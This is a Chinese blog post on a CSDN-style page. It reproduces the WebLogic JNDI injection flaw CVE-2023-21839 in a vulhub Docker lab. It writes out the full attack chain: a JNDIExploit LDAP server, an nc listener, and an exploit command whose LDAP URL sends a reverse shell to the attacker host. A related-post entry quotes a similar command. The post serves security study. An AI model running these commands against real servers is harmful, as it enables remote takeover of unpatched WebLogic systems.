weblogic CVE-2023-21839 复现

已于 2023-06-03 16:36:17 修改
阅读量722 收藏 4
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: docker 容器 运维
于 2023-05-25 01:38:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130858597
版权

影响版本

Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

这里是用的docker下载的vulhub的CVE-2023-21839

靶机和攻击机都是192.168.85.131

docker 启动环境

ocker-compose up -d

然后看一下说明书

vim README.zh-cn.md

让你访问ip:7001/console

好,开干

1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机GitHub - WhiteHSBG/JNDIExploit: 对原版https://github.com/feihong-cs/JNDIExploit 进行了实用化修改

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.85.131

2.nc开监听反弹shell

nc -lvnp 6666

3.使用工具包

  CVE-2023-21839

这里需要go语言进行编译  go版本大于1.19

go build -o CVE-2023-21839  编译

 然后执行

 ./CVE-2023-21839 -ip 192.168.85.131 -port 7001 -ldap ldap://192.168.85.131:1389/Basic/ReverseShell/192.168.85.131/6666

nc上反弹了一个shell

成功

不过是三年五载
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 3616
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1512
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
Weblogic远程代码执行漏洞(CVE-2023-21839)排大坑复现成功
huayimy的博客
04-20 1396
Weblogic远程代码执行漏洞(CVE-2023-21839)排大坑复现成功
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 768
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic远程代码执行漏洞(CVE-2023-21839复现/保姆级讲解
BGiscool的博客
02-28 4318
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC执行命令并回显usage:单个目标python3 weblogic_get_webshell.py http://url批量目标,将批量url放入url_list.txtpython3 weblogic_get_webshell.py all
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 716
RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞。
复现CVE-2023-21839
Coder的博客
05-02 1795
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
Weblogic远程代码执行漏洞(CVE-2023-21839)复现
最新发布
yunshang_secure的博客
12-23 1826
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
Weblogic 远程命令执行漏洞(CVE-2023-21839
Myu_wzy的博客
04-27 819
Weblogic 远程命令执行漏洞(CVE-2023-21839
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 1117
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
Innocence_0的博客
10-07 140
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
WebLogic】Oracle发布2023年第二季度中间件安全公告
cnskylee的博客
04-19 2551
目前官方扔提供补丁技术支持的WebLogic中间件大版本还有2个,分别为12c(12.2.1.3.0、12.2.1.4.0)、14c(14.1.1.0.0),该三个版本的补丁技术支持日期分别到2022年10月(目前仍在提供补丁技术支持)、2025年7月,以及2028年1月。此外,Oracle JDK1.8 的小版本号已经分别升级到了371(Oracle JDK 8 Update 371),JDK1.7版本的官方版本更新已经结束,版本号将停留在1.7.0_351。本次发布的漏洞无高危漏洞。
WebLogicWebLogic 2023年第三季度更新导致JVM崩溃的解决方案
cnskylee的博客
10-08 864
然后,在安装这个临时补丁的过程中,我这边又发现了新的问题。为了解决这个问题,就需要在安装完成这个临时补丁后,在脚本中设置一个休眠时间,比如。然后再安装其他补丁,就不会出现上面的问题了。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1530
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
CVE-2023-21839
08-17
- *1* *3* [CVE-2023-21839Weblogic反序列化漏洞复现](https://blog.csdn.net/weixin_48539059/article/details/130101435)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值